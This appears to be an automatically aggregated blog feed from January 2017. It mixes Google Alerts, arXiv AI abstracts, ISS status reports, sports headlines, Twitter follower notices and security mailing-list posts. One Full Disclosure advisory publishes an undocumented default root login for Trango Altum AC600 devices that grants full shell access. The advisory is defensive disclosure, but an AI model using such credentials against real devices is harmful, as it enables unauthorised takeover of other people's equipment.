Latest YouTube Video

Saturday, January 7, 2017

Anonymous – Operation Awake The Masses 2017

Anonymous is everyone; everyone can take action in his own way against their own governments if they believe that the people working there, does ...

from Google Alert - anonymous http://ift.tt/2i5pHzD
via IFTTT

advertise with us

Anonymous Ads is an advertising network that doesn't collect personal data. Diverse inventory; Selection of traffic sources; Affordable traffic ...

from Google Alert - anonymous http://ift.tt/2i2SNwl
via IFTTT

Craig Green reveals the meaning of his anonymous travellers

Craig Green reveals the meaning of his anonymous travellers. The designer opens up about his AW17 collection, presented yesterday at London ...

from Google Alert - anonymous http://ift.tt/2jnI84j
via IFTTT

Appendix

Overview of the workspaces cost optimizer solution anonymous data collection on AWS.

from Google Alert - anonymous http://ift.tt/2i0qH9T
via IFTTT

[FD] YSTS 11th Edition - CFP

Hello FD, Where: Sao Paulo, Brazil When: May 22nd, 2017 Call for Papers Opens: December 30th, 2016 Call for Papers Close: February 28th, 2017 http://www.ysts.org @ystscon ABOUT THE CONFERENCE you Sh0t the Sheriff is a very unique, one-day, event dedicated to bringing cutting edge talks to the top-notch professionals of the Information Security Community. The conference’s main goal is to bring the attendees to the current state of the information security world by bringing the most relevant topics from different Infosec segments of the market and providing an environment that is ideal for both networking and idea sharing. YSTS is a an exclusive, mostly invite-only security con. Getting a talk accepted, will, not only get you to the event, but after you successfully present your talk, you will receive a challenge-coin that guarantees your entry to YSTS for as long as the conference exists. Due to the great success of the previous years' editions, yes, we're keeping the good old usual format: * YSTS 11 will be held at an almost secret location only announced to whom it may concern a couple of weeks before the con * the venue will be, most likely, a very cool club or a bar (seriously, check out the pictures) * appropriate environment to network with great security folks from Brazil and abroad * since it is a one-day con with tons of talks and activities, we make sure we fill everyone with coffee, food and booze CONFERENCE FORMAT Anything Information Security related is interesting for the conference, which will help us create a cool and diverse line-up. We strictly *do not* accept commercial/ product-related pitches. Keep in mind though, this is a one-day conference, we receive a lot of submissions, so your unique research with cool demos and any other possible twist you can throw in to keep the audience engaged will surely stand out to the other papers. SPEAKER BENEFITS (and yeah, that applies only to the 30 minute-long talks) USD 1,000.00 per talk to help covering travel expenses for international speakers * Breakfast, lunch and dinner during conference * Pre-and-post-conference official party (and the unofficial ones as well) * Auditing products in traditional Brazilian barbecue restaurants * Life-time free admission for all future YSTS conferences SUBMIT YOUR PAPER http://ift.tt/2imE0xb IMPORTANT CONTACT INFORMATION General Inquiries: b0ard/at/ysts.org Sponsorship Inquiries: sponsors/at/ysts.org We hope to see you there! Luiz Eduardo & Nelson Murilo & Willian Caprino

Source: Gmail -> IFTTT-> Blogger

[FD] Trango Altum AC600 Default root Login

[+] Credits: Ian Ling [+] Website: iancaling.com [+] Source: http://ift.tt/2iMm6XW Vendor: ================= http://ift.tt/2j1c9TX Product: ====================== -Altum AC600 Vulnerability Details: ===================== Trango Altum AC600′s have a default root login (root:abcd1234) that is accessible via both SSH and telnet by default. Logging in as root on this device gives you access to a Linux shell, granting you full control over the device. These credentials are not mentioned in any manuals, or on Trango's website. Affected versions: ALL VERSIONS (as of 2016/01/06) Impact: The remote attacker has full control over the device, including shell access. This can lead to packet sniffing and tampering, denial of service, and even damage to the device. Disclosure Timeline: =================================== Vendor Notification: December 23, 2016 (no response received) Public Disclosure: January 4th, 2017 Exploitation Technique: ======================= Remote Severity Level: ================ Critical

Source: Gmail -> IFTTT-> Blogger

Friday, January 6, 2017

I have a new follower on Twitter


rohit
Ex @Microsoft design prototyper, now working in FinTech. Likes: UX design, open-source, JavaScript, chicken and burritos.
London, UK
https://t.co/Iy3NyhNITe
Following: 1283 - Followers: 7813

January 06, 2017 at 07:49PM via Twitter http://twitter.com/romiem

Am I the only one who thinks anonymous functions are harder to read? I usually try to avoid using ...

I usually try to avoid using them. Sure you type less, but looking at exec(say, "Hi there!"); seems much easier to understand at first glance than ...

from Google Alert - anonymous http://ift.tt/2jl7Bv7
via IFTTT

Get Smart About Hallucinogens

Read Get Smart About Hallucinogens by Anonymous with Kobo. Learn the basic facts behind the dangers of hallucinogens (LSD, psilocybin ...

from Google Alert - anonymous http://ift.tt/2i200jo
via IFTTT

I have a new follower on Twitter


Vindicia
The True Leader in Enterprise-Class Subscription Billing. Join us on the official home for products, news and payment industry intelligence.
Redwood City, CA
https://t.co/wsNV96nh1d
Following: 8741 - Followers: 11324

January 06, 2017 at 06:34PM via Twitter http://twitter.com/Vindicia

Microsoft/TypeScript

Improved syntax to instantiate anonymous classes #13326. Open. ivaynberg opened this Issue 29 minutes ago · 0 comments ...

from Google Alert - anonymous http://ift.tt/2i00006
via IFTTT

MLB: Mariners acquire former All-Star P Yovani Gallardo and cash considerations from Orioles for OF Seth Smith (ESPN)

from ESPN http://ift.tt/1eW1vUH
via IFTTT

Ravens: Justin Tucker named unanimous selection to 2016 AP All-Pro team; Chiefs PR Tyreek Hill only other unanimous pick (ESPN)

from ESPN http://ift.tt/17lH5T2
via IFTTT

FTC Sues D-Link Over Failure to Secure Its Routers and IP Cameras from Hackers

Image Source: Book - Protect Your Windows Network from Perimeter to Data The United States' trade watchdog has sued Taiwan-based D-link, alleging that the lax security left its products vulnerable to hackers. The Federal Trade Commission (FTC) filed a lawsuit (pdf) against D-Link on Thursday, arguing that the company failed to implement necessary security protection in its routers and


from The Hacker News http://ift.tt/2jc0iSw
via IFTTT

Ravens Image: Steve Smith Sr. writes retirement letter to Roger Goodell, says he'll "no longer be antagonizing" DBs (ESPN)

from ESPN http://ift.tt/17lH5T2
via IFTTT

ISS Daily Summary Report – 1/5/2017

Extravehicular Activity (EVA) Preparation: Today the crew performed final preparation for EMU EVA #38 (Channel 3A Battery R&R). Hatch open is scheduled tomorrow, Friday January 6th at 12:10 GMT (6:10 CST). Earlier today the crew completed the pre-EVA health status exams, final EVA tool configuration and procedure reviews. Ground specialists and the crewmembers participated in a conference to discuss any final questions.  Finally, the crew prepared the Equipment lock for the EVA. Mobile Servicing System (MSS) Operations: Wednesday evening, Robotics Ground Controllers powered up the MSS and operated the Space Station Remote Manipulator System (SSRMS) and the Special Purpose Dexterous Manipulator (SPDM) Body and Arm2 to stow the Robotic Offset Tool (ROST) back on the SPDM Tool Holder Assembly (THA). MSS performance was nominal. European Space Agency (ESA) Education Payloads Operations (EPO) Status Checks: The crew performed a status check and photograph the progress of the three EPO experiments – Crisstal, Cataliss, and Ceres. The crew will took closeup photos of the crystals and catalyst reactions in Crisstal and Cataliss.  For Ceres, the crew removed the box from the Veggie facility and photographed the growth of the plants and seed supports. Ceres, is devoted to the study of plant growth; lentil, mustard, and radish seeds were selected having met the required criteria of rapid germination, vertical growth, and resistance to long-term storage. Crisstal, aims to demonstrate the role of gravity in growing crystals, where in microgravity growth is the same in all directions, giving a perfect regular shape of the crystal. The crystal grows in a liquid solution from saturated Rochelle salt. The student designed experiment, Cataliss, aims to prove the influence of gravity on the catalytic reactions. For this purpose, the experiment operates from catalysis of enzymes and gelatin for reaction with a duration of three days.  Today’s Planned Activities All activities were completed unless otherwise noted. Initiate EDV fill from PWD Health Maintenance System (HMS) Periodic Health Status (PHS) Pre EVA Examination Setup PP СО check on the Central Post with CSA-CP Cntr. В1(В2) of RODNIK БВ1(2) tank flush in Progress 433 Periodic Health Status (PHS) Pre EVA Examination Formaldehyde Monitoring Kit (FMK) Stow Operation Pre-EVA Periodic Health Status Examination – Stow Regenerative Environmental Control and Life Support System (RGN) WSTA Fill EDV Fill from PWD Term Regenerative Environmental Control and Life Support System (ECLSS) Recycle Tank Fill Part 3 DAN. Experiment Ops DАN. Experiment Ops Assist Extravehicular Activity (EVA) Tool Configuring ESA Weekly crew conference Extravehicular Activity (EVA) Tool Audit. Pille data downlink, pre USOS EVA Pille sensors placement  Delta file prep Samsung Tablet charge on Soyuz 732 DAN. Experiment Ops DAN. Experiment Ops Assist Space Headaches – Weekly Questionnaire Extravehicular Activity (EVA) Procedure Review Extravehicular Activity (EVA) Procedure Conference IVA Tools Kits Audit Photodocumentation of the Crisstal and Cataliss experiments. Equipment Lock (E-LK) Preparation Photodocumentation of the EPO Pesquet Ceres Samsung Tablet charge finish on Soyuz 732 ESA Monthly Management Conference ПТАБ-1М (А303) temperature check Regenerative Environmental Control and Life Support System (RGN) WSTA Fill БВН heating fan grille cleaning in Soyuz 732 Stow items for disposal on Progress 433 (DC1), IMS update ПТАБ-1М temperature check (pos. А303)  Completed Task List Items Node 3 Axial Shield Bundle Build Extravehicular Activity (EVA) Tool Configuration Manufacturing Device Print Removal, Clean and Stow Station Support Computer (SSC) 9 Fan Cleaning SSC 6 Reload Ground Activities All activities were completed unless otherwise noted. Battery Set 1A3 Discharge S-Band string 2 activation  Three-Day Look Ahead: Friday, 01/06: EMU EVA #38 (Channel 3A Battery R&R) Saturday, 01/07: Crew Off Duty, post EVA PHS, EMU H2O recharge, EVA Debrief Sunday, 01/08: Crew Off Duty QUICK ISS Status – Environmental Control Group:     Component Status Elektron Off Vozdukh Manual [СКВ] 1 – SM Air Conditioner System (“SKV1”) Off          [СКВ] 2 – SM Air Conditioner System (“SKV2”) On Carbon Dioxide Removal Assembly (CDRA) Lab Standby Carbon Dioxide Removal Assembly (CDRA) Node 3 Operate Major Constituent Analyzer (MCA) Lab Operate Major Constituent Analyzer (MCA) Node 3 Idle Oxygen Generation Assembly (OGA) Standby Urine Processing Assembly (UPA) Standby Trace Contaminant Control System (TCCS) Lab Off Trace Contaminant Control System (TCCS) Node 3 Full Up  

from ISS On-Orbit Status Report http://ift.tt/2ijBE23
via IFTTT

Netgear launches Bug Bounty Program for Hacker; Offering up to $15,000 in Rewards

It might be the easiest bug bounty program ever. Netgear launched on Thursday a bug bounty program to offer up to $15,000 in rewards to hackers who will find security flaws in its products. Since criminals have taken aim at a rapidly growing threat surface created by millions of new Internet of things (IoT) devices, it has become crucial to protect routers that contain the keys to the


from The Hacker News http://ift.tt/2i0cjwo
via IFTTT

[FD] CarolinaCon-13 - May 2017 - Call for Papers/Presenters and Attendees

COOs reject anonymous resumes -- and get their minds blown when the people behind those ...

From Around The World Stomp - Millennials are deemed as being the luckiest generation with everything given to them on a silver platter. Read more ...

from Google Alert - anonymous http://ift.tt/2hXgLZM
via IFTTT

Send order data to MailChimp after an anonymous user enters their email address

This does not work in a situation where a user is anonymous until they provide their email address at checkout. It would be helpful if data could be sent ...

from Google Alert - anonymous http://ift.tt/2iIm2s8
via IFTTT

Re: [FD] Persisted Cross-Site Scripting (XSS) in Confluence Jira Software

Sorry, the right title is: Persisted Cross-Site Scripting (XSS) in Confluence Software On 04-01-2017 08:57, Moritz Naumann wrote: > Hi Jodson, > > Am 03.01.2017 um 19:50 schrieb jlss: >> =====[ Tempest Security Intelligence - ADV-3/2016 CVE-2016-6283 >> ]============== >> >> Persisted Cross-Site Scripting (XSS) in Confluence Jira Software >>

Source: Gmail -> IFTTT-> Blogger

Re: [FD] Persisted Cross-Site Scripting (XSS) in Confluence Jira Software

Just to clarify the issue only affects Confluence versions < 5.10.6. You can find the original bug report at http://ift.tt/2jaH1Rs.

Source: Gmail -> IFTTT-> Blogger

Get Smart About Marijuana

Read Get Smart About Marijuana by Anonymous with Kobo. Learn the basic facts behind marijuana, including its history and changing legal status, ...

from Google Alert - anonymous http://ift.tt/2ii6AQx
via IFTTT

KillDisk Ransomware Targets Linux; Demands $250,000 Ransom, But Won't Decrypt Files

What you'll do if Ransomware infects you? Should you pay or not to recover your files? Believe me, the FBI advises - Pay off the criminals to get your files back if you don't have a backup. But paying off a ransom to cyber criminals is definitely not a wise option because there is no guarantee that you'll get the decryption key in return. In the latest incident, the new variant of KillDisk


from The Hacker News http://ift.tt/2iihwgK
via IFTTT

Best VPN Services for 2017 — Get Up to 91% Discount On Lifetime Subscriptions

Since most of us rely upon the Internet for day-to-day activities, hacking and spying have become a prime concern today, and so have online security and privacy. The governments across the world have been found to be conducting mass surveillance and then there are hackers and cyber criminals who are always looking for ways to steal your sensitive and personal data from the ill-equipped


from The Hacker News http://ift.tt/2hXiu1h
via IFTTT

Thursday, January 5, 2017

Toward negotiable reinforcement learning: shifting priorities in Pareto optimal sequential decision-making. (arXiv:1701.01302v1 [cs.AI])

Existing multi-objective reinforcement learning (MORL) algorithms do not account for objectives that arise from players with differing beliefs. Concretely, consider two players with different beliefs and utility functions who may cooperate to build a machine that takes actions on their behalf. A representation is needed for how much the machine's policy will prioritize each player's interests over time. Assuming the players have reached common knowledge of their situation, this paper derives a recursion that any Pareto optimal policy must satisfy. Two qualitative observations can be made from the recursion: the machine must (1) use each player's own beliefs in evaluating how well an action will serve that player's utility function, and (2) shift the relative priority it assigns to each player's expected utilities over time, by a factor proportional to how well that player's beliefs predict the machine's inputs. Observation (2) represents a substantial divergence from na\"{i}ve linear utility aggregation (as in Harsanyi's utilitarian theorem, and existing MORL algorithms), which is shown here to be inadequate for Pareto optimal sequential decision-making on behalf of players with different beliefs.



from cs.AI updates on arXiv.org http://ift.tt/2j9R21c
via IFTTT

Generating Focussed Molecule Libraries for Drug Discovery with Recurrent Neural Networks. (arXiv:1701.01329v1 [cs.NE])

In de novo drug design, computational strategies are used to generate novel molecules with good affinity to the desired biological target. In this work, we show that recurrent neural networks can be trained as generative models for molecular structures, similar to statistical language models in natural language processing. We demonstrate that the properties of the generated molecules correlate very well with the properties of the molecules used to train the model. In order to enrich libraries with molecules active towards a given biological target, we propose to fine-tune the model with small sets of molecules, which are known to be active against that target.

Against Staphylococcus aureus, the model reproduced 14% of 6051 hold-out test molecules that medicinal chemists designed, whereas against Plasmodium falciparum (Malaria) it reproduced 28% of 1240 test molecules. When coupled with a scoring function, our model can perform the complete de novo drug design cycle to generate large sets of novel molecules for drug discovery.



from cs.AI updates on arXiv.org http://ift.tt/2iHdFgu
via IFTTT

NeuroRule: A Connectionist Approach to Data Mining. (arXiv:1701.01358v1 [cs.AI])

Classification, which involves finding rules that partition a given data set into disjoint groups, is one class of data mining problems. Approaches proposed so far for mining classification rules for large databases are mainly decision tree based symbolic learning methods. The connectionist approach based on neural networks has been thought not well suited for data mining. One of the major reasons cited is that knowledge generated by neural networks is not explicitly represented in the form of rules suitable for verification or interpretation by humans. This paper examines this issue. With our newly developed algorithms, rules which are similar to, or more concise than those generated by the symbolic methods can be extracted from the neural networks. The data mining process using neural networks with the emphasis on rule extraction is described. Experimental results and comparison with previously published works are presented.



from cs.AI updates on arXiv.org http://ift.tt/2j9WLDY
via IFTTT

Applications of Algorithmic Probability to the Philosophy of Mind. (arXiv:1404.1718v8 [cs.AI] UPDATED)

This paper presents formulae that can solve various seemingly hopeless philosophical conundrums. We discuss the simulation argument, teleportation, mind-uploading, the rationality of utilitarianism, and the ethics of exploiting artificial general intelligence. Our approach arises from combining the essential ideas of formalisms such as algorithmic probability, the universal intelligence measure, space-time-embedded intelligence, and Hutter's observer localization. We argue that such universal models can yield the ultimate solutions, but a novel research direction would be required in order to find computationally efficient approximations thereof.



from cs.AI updates on arXiv.org http://ift.tt/1iqPl8U
via IFTTT

Combining Existential Rules and Transitivity: Next Steps. (arXiv:1504.07443v2 [cs.AI] UPDATED)

We consider existential rules (aka Datalog+) as a formalism for specifying ontologies. In recent years, many classes of existential rules have been exhibited for which conjunctive query (CQ) entailment is decidable. However, most of these classes cannot express transitivity of binary relations, a frequently used modelling construct. In this paper, we address the issue of whether transitivity can be safely combined with decidable classes of existential rules.

First, we prove that transitivity is incompatible with one of the simplest decidable classes, namely aGRD (acyclic graph of rule dependencies), which clarifies the landscape of `finite expansion sets' of rules.

Second, we show that transitivity can be safely added to linear rules (a subclass of guarded rules, which generalizes the description logic DL-Lite-R) in the case of atomic CQs, and also for general CQs if we place a minor syntactic restriction on the rule set. This is shown by means of a novel query rewriting algorithm that is specially tailored to handle transitivity rules.

Third, for the identified decidable cases, we pinpoint the combined and data complexities of query entailment.



from cs.AI updates on arXiv.org http://ift.tt/1zbdZYz
via IFTTT

Anonymous

The Burrard: Anonymous - See 1524 traveller reviews, 306 candid photos, and great deals for The Burrard at TripAdvisor.

from Google Alert - anonymous http://ift.tt/2hXGB34
via IFTTT

Ravens: Steve Smith missed $1M incentive because offense didn't improve from 2015 - Schefter; team needed 187 more yds (ESPN)

from ESPN http://ift.tt/17lH5T2
via IFTTT

ISS Daily Summary Report – 1/3/2017

Extravehicular Activity (EVA) Preparation:  Today, the USOS crew continued to gather and configure tools that will be used during Friday’s EVA, which will upgrade Nickel Hydride Channel 3A batteries to Lithium Ion batteries. They also configured two cameras that will be used during the EVA. Finally, the crew reviewed procedures associated with EVA. US EVA #38 is scheduled for Friday, January 6th with Joint Airlock Egress occurring at ~6:15am CST. Mobile Servicing System (MSS) Operations:  Yesterday and overnight (GMT 003-004), the Robotics Ground Controllers powered up the MSS and operated the Space Station Remote Manipulator System (SSRMS) and the Special Purpose Dexterous Manipulator (SPDM) Body and Arm2 to unstow the Robotic Offset Tool (ROST) from the SPDM Tool Holder Assembly (THA). They then used it to fasten the H1 (secondary) bolt on the Lithium-Ion (Li-Ion) battery in Slot 5 of the 3A Integrated Electronics Assembly (IEA). They also made multiple attempts to fasten the H1 bolt on the Li-Ion battery in Slot 1 of the 3A IEA without success. Finally the Robotics Ground Controllers maneuvered the SSRMS and the SPDM to a park position and maneuvered SPDM Arm2 as required to allow for an inspection of the ROST using SPDM Camera Light Pan Tilt Unit (PTU) Assembly 1 (CLPA1). There was a Multilateral Anomaly Resolution Team (MART) meeting at 11:00am Central Time (CT) this morning to discuss the issue with fastening the H1 bolt on the Li-Ion battery in slot 1. MSS performance was nominal.  Body Measures: Today’s Body Measures activity was the second inflight session for the 49S subject. The crew, with assistance from a trained operator, conducted a Body Measures data collection session. The crew configured still cameras and video, then collected the Neutral Body Posture video and stow the equipment. NASA is collecting in-flight anthropometric data (body measurements) to assess the impact of physical body shape and size changes on suit sizing. Still and video imagery is captured and a tape measure is used to measure segmental length, height, depth, and circumference data for all body segments (chest, waist, hip, arms, legs, etc.) from astronauts before, during and after their flight missions. Synchronized Position Hold, Engage, Reorient, Experimental Satellites (SPHERES) Zero Robotics Unit Test: The crew configured the SPHERES hardware and an EXPRESS Laptop Computer (ELC) then executed an end-to-end hardware and software test prior to the Zero Robotics competition scheduled for January 27, 2017. The SPHERES Zero Robotics investigation establishes an opportunity for high school students to design research for the ISS. As part of a competition, students write algorithms for the SPHERES satellites to accomplish tasks relevant to future space missions. The algorithms are tested by the SPHERES team and the best designs are selected for the competition to operate the SPHERES satellites on board the ISS. Fine Motor Skills: The crew performed their weekly Fine Motor Skills tests, performing a series of interactive tasks on a touchscreen tablet. The investigation studies how fine motor skills are effected by long-term microgravity exposure, different phases of microgravity adaptation, and sensorimotor recovery after returning to Earth gravity. The goal of Fine Motor Skills is to answer how fine motor performance in microgravity trend/vary over the duration of a six-month and year-long space mission; how fine motor performance on orbit compare with that of a closely matched participant on Earth; and how performance trend/vary before and after gravitational transitions, including the periods of early flight adaptation, and very early/near immediate post-flight periods. Today’s Planned Activities All activities were completed unless otherwise noted. Multi-purpose Small Payload Rack (MSPR) /Group Combustion Module (GCM) Component Activation on GMT004 Regeneration of БМП Ф2 Micropurification Cartridge (start) Fine Motor Skills Experiment Test – Subject Charging EVA Camera D4 Battery Regenerative Environmental Control and Life Support System (ECLSS) Recycle Tank Drain Extravehicular Activity (EVA) Tool Configuring Glisser-M Battery Charging: setup and start charging the first batch of batteries (6 pcs) [ПУ БПК] Condensate Supply Unit Control Panel R&R Body Measures Equipment Gather Body Measures Experiment Operations Regenerative Environmental Control and Life Support System (ECLSS) Recycle Tank Drain Part 2  [МФР] Membrane Filter Separator Leak Check Columbus GFI Test Preparation Body Measures Experiment Operations – Operator GFI test of all twelve COLUMBUS SUPs 120V DC power outlets Photodocumentation of the Crisstal and Cataliss experiments. Photodocumentation of the EPO Pesquet Ceres ESA ACTIVE DOSIMETER MOBILE UNIT SWAP Columbus GFI Test Inverter Reconfiguration Columbus GFI Test post reconfiguration Fine Motor Skills Experiment Test – Subject SPHERES Payload OBT Russian Crew Strata Card Changeout Extravehicular Activity (EVA) Tool Configuring SPHERES Crew Conference ISS HAM Service Module Pass Countermeasures System (CMS) Advanced Resistive Exercise Device (ARED) Cylinder Flywheel Evacuation Regenerative Environmental Control and Life Support System (RGN) WSTA Fill Delta file prep Extravehicular Activity (EVA) iPad Contingency Procedures preparation Charging the first batch of batteries (6 pcs) (End) and Charging the second batch of batteries (6 pcs) (Start) Multi-purpose Small Payload Rack (MSPR) /Group Combustion Module (GCM) Component Deactivation Regenerative Environmental Control and Life Support System (RGN) WSTA Fill Packed Bed Reactor Experiment Lab Video Setup SPHERES Test Session Setup СОЖ maintenance Habitability Human Factors Directed Observations – Subject Dose Tracker Data Entry Charging the second batch of batteries (6 pcs) and Battery stow Soyuz 732 (ТК732БО_сервант_конт1) HERO3 GoPro Batteries Recharge, Initiate Packed Bed Reactor Experiment Lab Video Return Photo/TV Extravehicular Activity (EVA) Camera Configuration Life On The Station Photo and Video SPHERES Test Session Run Rad Detector Rotate Soyuz 732 GoPro HERO3 batteries charge – finish and stow (ТК732БО_сервант_конт1) ISS HAM Service Module Pass Extravehicular Activity (EVA) Procedure Review SPHERES Test Shutdown Flight Director/ISS CREW CONFERENCE Regeneration of БМП Ф2 Absorption Cartridge (end) Completed Task List Items Deploy ESA Active Dosimeter Mobile Units (2) for Area Monitoring Ground Activities All activities were completed unless otherwise noted. Lab CDRA Activation Lab CDRA Standby 3A Battery H1 bolt troubleshooting Three-Day Look Ahead: Thursday, 01/05: EVA Procedure Review, EVA Conference, Airlock Equipment Lock Prep, EVA Tool Audit Friday, 01/06: EMU EVA #38 (Channel 3A Battery R&R) Saturday, 01/07: EMU Recharge, […]

from ISS On-Orbit Status Report http://ift.tt/2hUHSEE
via IFTTT

FBI Hacked, Again! Hacker Leaks Data After Agency Failed to Patch Its Site

It seems like the FBI has been hacked, once again! A hacker, using Twitter handle CyberZeist, has claimed to have hacked the FBI's website (fbi.gov) and leaked personal account information of several FBI agents publically. The hacker exploited a zero-day vulnerability in the Plone CMS, an Open Source Content Management software used by FBI to host its website, and leaked personal data of 155


from The Hacker News http://ift.tt/2ie74a6
via IFTTT

I have a new follower on Twitter


Smargasy Inc.
Smargasy is your one-stop shop for all your software-related needs.
Cape Coral, FL, USA
http://t.co/XrYtvMdA
Following: 1923 - Followers: 2153

January 05, 2017 at 05:39AM via Twitter http://twitter.com/smargasy

I have a new follower on Twitter


Evercurrent.io
Know when updates are available on @drupal & @meteorjs, never miss another update.
United States
https://t.co/mQCyFmHXyY
Following: 970 - Followers: 1011

January 05, 2017 at 05:39AM via Twitter http://twitter.com/evercurrentio

This Ransomware Unlocks Your Files For Free If You Read CyberSecurity Articles

Ransomware has been around for a few years, but in last two years, it has become one of the fastest growing threats to businesses and users across the world, so will be in 2017. Ransomware is a piece of malware that encrypts files on your computer with strong encryption algorithms and then demands a ransom money in Bitcoin to decrypt the data so you can regain access to your encrypted files.


from The Hacker News http://ift.tt/2hTSQ1Z
via IFTTT

I have a new follower on Twitter


Inclusive Wicca Shop
Making beautiful things to raise funds for Gendered Intelligence. Inclusive Wicca welcomes LGBTQIA, BIPOC, & disabled people. https://t.co/Gzj04sBKn3
Oxford, England
https://t.co/UvhlxXYMjg
Following: 492 - Followers: 43

January 05, 2017 at 03:09AM via Twitter http://twitter.com/incWiccaShop

Clouds of Andromeda


The beautiful Andromeda Galaxy is often imaged by planet Earth-based astronomers. Also known as M31, the nearest large spiral galaxy is a familiar sight with dark dust lanes, bright yellowish core, and spiral arms traced by blue starlight. A mosaic of well-exposed broad and narrow-band image data, this colorful, premier portrait of our neighboring island universe offers strikingly unfamiliar features though, faint reddish clouds of glowing ionized hydrogen gas in the same wide field of view. Still, the ionized hydrogen clouds likely lie in the foreground of the scene, well within our Milky Way Galaxy. They could be associated with the pervasive, dusty interstellar cirrus clouds scattered hundreds of light-years above our own galactic plane. If they were located at the 2.5 million light-year distance of the Andromeda Galaxy they would be enormous, since the Andromeda Galaxy itself is 200,000 or so light-years across. via NASA http://ift.tt/2ia5kyQ

Wednesday, January 4, 2017

I have a new follower on Twitter


Envision
#Envision is a cloud-based #BI platform to manage #data Architected for an optimized self-service user experience. Speeds up #data #visualization & #analysis
Worldwide
https://t.co/yrcVjcMRb2
Following: 2857 - Followers: 3287

January 04, 2017 at 10:59PM via Twitter http://twitter.com/envisionbi

Anonymous Henchmen

Metal band Anonymous Henchmen play Zombies with Shields and Wounded Souls.

from Google Alert - anonymous http://ift.tt/2hUARa5
via IFTTT

Fuzzy finite element model updating using metaheuristic optimization algorithms. (arXiv:1701.00833v1 [cs.AI])

In this paper, a non-probabilistic method based on fuzzy logic is used to update finite element models (FEMs). Model updating techniques use the measured data to improve the accuracy of numerical models of structures. However, the measured data are contaminated with experimental noise and the models are inaccurate due to randomness in the parameters. This kind of aleatory uncertainty is irreducible, and may decrease the accuracy of the finite element model updating process. However, uncertainty quantification methods can be used to identify the uncertainty in the updating parameters. In this paper, the uncertainties associated with the modal parameters are defined as fuzzy membership functions, while the model updating procedure is defined as an optimization problem at each {\alpha}-cut level. To determine the membership functions of the updated parameters, an objective function is defined and minimized using two metaheuristic optimization algorithms: ant colony optimization (ACO) and particle swarm optimization (PSO). A structural example is used to investigate the accuracy of the fuzzy model updating strategy using the PSO and ACO algorithms. Furthermore, the results obtained by the fuzzy finite element model updating are compared with the Bayesian model updating results.



from cs.AI updates on arXiv.org http://ift.tt/2hSYEJ9
via IFTTT

A K-fold Method for Baseline Estimation in Policy Gradient Algorithms. (arXiv:1701.00867v1 [cs.AI])

The high variance issue in unbiased policy-gradient methods such as VPG and REINFORCE is typically mitigated by adding a baseline. However, the baseline fitting itself suffers from the underfitting or the overfitting problem. In this paper, we develop a K-fold method for baseline estimation in policy gradient algorithms. The parameter K is the baseline estimation hyperparameter that can adjust the bias-variance trade-off in the baseline estimates. We demonstrate the usefulness of our approach via two state-of-the-art policy gradient algorithms on three MuJoCo locomotive control tasks.



from cs.AI updates on arXiv.org http://ift.tt/2iRo2Mt
via IFTTT

On the Usability of Probably Approximately Correct Implication Bases. (arXiv:1701.00877v1 [cs.LO])

We revisit the notion of probably approximately correct implication bases from the literature and present a first formulation in the language of formal concept analysis, with the goal to investigate whether such bases represent a suitable substitute for exact implication bases in practical use-cases. To this end, we quantitatively examine the behavior of probably approximately correct implication bases on artificial and real-world data sets and compare their precision and recall with respect to their corresponding exact implication bases. Using a small example, we also provide qualitative insight that implications from probably approximately correct bases can still represent meaningful knowledge from a given data set.



from cs.AI updates on arXiv.org http://ift.tt/2hSSpFe
via IFTTT

Stochastic Planning and Lifted Inference. (arXiv:1701.01048v1 [cs.AI])

Lifted probabilistic inference (Poole, 2003) and symbolic dynamic programming for lifted stochastic planning (Boutilier et al, 2001) were introduced around the same time as algorithmic efforts to use abstraction in stochastic systems. Over the years, these ideas evolved into two distinct lines of research, each supported by a rich literature. Lifted probabilistic inference focused on efficient arithmetic operations on template-based graphical models under a finite domain assumption while symbolic dynamic programming focused on supporting sequential decision-making in rich quantified logical action models and on open domain reasoning. Given their common motivation but different focal points, both lines of research have yielded highly complementary innovations. In this chapter, we aim to help close the gap between these two research areas by providing an overview of lifted stochastic planning from the perspective of probabilistic inference, showing strong connections to other chapters in this book. This also allows us to define Generalized Lifted Inference as a paradigm that unifies these areas and elucidates open problems for future research that can benefit both lifted inference and stochastic planning.



from cs.AI updates on arXiv.org http://ift.tt/2iRpFJS
via IFTTT

Fitted Learning: Models with Awareness of their Limits. (arXiv:1609.02226v3 [cs.AI] UPDATED)

Though deep learning has pushed the boundaries of classification forward, in recent years hints of the limits of standard classification have begun to emerge. Problems such as fooling, adding new classes over time, and the need to retrain learning models only for small changes to the original problem all point to a potential shortcoming in the classic classification regime, where a comprehensive a priori knowledge of the possible classes or concepts is critical. Without such knowledge, classifiers misjudge the limits of their knowledge and overgeneralization therefore becomes a serious obstacle to consistent performance. In response to these challenges, this paper extends the classic regime by reframing classification instead with the assumption that concepts present in the training set are only a sample of the hypothetical final set of concepts. To bring learning models into this new paradigm, a novel elaboration of standard architectures called the competitive overcomplete output layer (COOL) neural network is introduced. Experiments demonstrate the effectiveness of COOL by applying it to fooling, separable concept learning, one-class neural networks, and standard classification benchmarks. The results suggest that, unlike conventional classifiers, the amount of generalization in COOL networks can be tuned to match the problem.



from cs.AI updates on arXiv.org http://ift.tt/2cxD070
via IFTTT

The London Guide and Stranger's Safeguard

Read The London Guide and Stranger's Safeguard by Anonymous with Kobo. The London Guide and Stranger's Safeguard against the cheats, ...

from Google Alert - anonymous http://ift.tt/2iCaEOu
via IFTTT

Surprise!

EC receives $1M gift from anonymous donor on eve of 2017. January 04, 2017. An anonymous donor has given Earlham College a surprise gift of $1 ...

from Google Alert - anonymous http://ift.tt/2j5Lbd8
via IFTTT

[FD] Stop User Enumeration does not stop user enumeration (WordPress plugin)

